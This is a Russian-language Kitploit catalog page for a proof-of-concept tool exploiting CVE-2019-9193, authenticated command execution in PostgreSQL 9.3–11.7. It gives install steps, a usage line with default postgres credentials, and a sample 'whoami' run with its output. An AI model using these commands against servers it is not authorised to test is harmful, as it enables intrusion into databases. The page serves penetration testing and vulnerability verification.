Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-9193 — это PoC-инструмент, предназначенный для эксплуатации аутентифицированной уязвимости удалённого выполнения кода (RCE) в определённых версиях PostgreSQL (9.3 - 11.7) | Kitploit
Инструменты/GitHubGitHub/geniuszly/cve-2019-9193
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз Данных
GitHubgeniuszly/cve-2019-9193

CVE-2019-9193

это PoC-инструмент, предназначенный для эксплуатации аутентифицированной уязвимости удалённого выполнения кода (RCE) в определённых версиях PostgreSQL (9.3 - 11.7)

Репозиторий
411 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GenPostgresRCEExploit — это PoC-инструмент для эксплуатации аутентифицированной уязвимости удаленного выполнения кода (RCE) в определенных версиях PostgreSQL (9.3 – 11.7). Он позволяет аутентифицированным пользователям выполнять системные команды на сервере базы данных PostgreSQL, уязвимом к CVE-2019-9193.

Возможности

  • Эксплуатация RCE: Выполняет системные команды через аутентифицированную сессию PostgreSQL.
  • Проверка версии: Проверяет версию целевого сервера PostgreSQL для подтверждения уязвимости.
  • Выполнение команд: Позволяет выполнять произвольные команды на сервере, если он уязвим.
  • Автоматическое управление таблицами: Создает и удаляет временную таблицу для выполнения команд без ручного вмешательства.

Требования

  • Python 3.x
  • Клиентская библиотека PostgreSQL (пакет psycopg2)

Установка

  1. Клонируйте репозиторий:
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    
  2. Установите необходимые пакеты:
    root@kitploit:~
    pip install -r requirements.txt
    

Использование

root@kitploit:~
python3 GenPostgresRCEExploit.py -i <целевой_ip> -p <порт> -d <имя_базы_данных> -U <имя_пользователя> -P <пароль> -c "<системная_команда>"

Опции

  • -i, --ip: IP-адрес сервера PostgreSQL (по умолчанию: 127.0.0.1)
  • -p, --port: Порт сервера PostgreSQL (по умолчанию: 5432)
  • -d, --database: Имя базы данных PostgreSQL (по умолчанию: template1)
  • -U, --user: Имя пользователя для подключения к серверу PostgreSQL (по умолчанию: postgres)
  • -P, --password: Пароль для подключения к серверу PostgreSQL (по умолчанию: postgres)
  • -c, --command: Системная команда для выполнения на сервере
  • -t, --timeout: Тайм-аут подключения в секундах (по умолчанию: 10)

Пример

root@kitploit:~
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"

Этот пример подключается к серверу PostgreSQL по адресу 192.168.1.10, аутентифицируется с указанными учетными данными и выполняет команду whoami.

Пример вывода

root@kitploit:~
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена

postgres

Отказ от ответственности

Данный инструмент предназначен только для образовательных целей и этического тестирования. Несанкционированное использование этого инструмента против любых систем незаконно и строго запрещено. Авторы не несут ответственности за любое неправомерное использование.

Скачать инструмент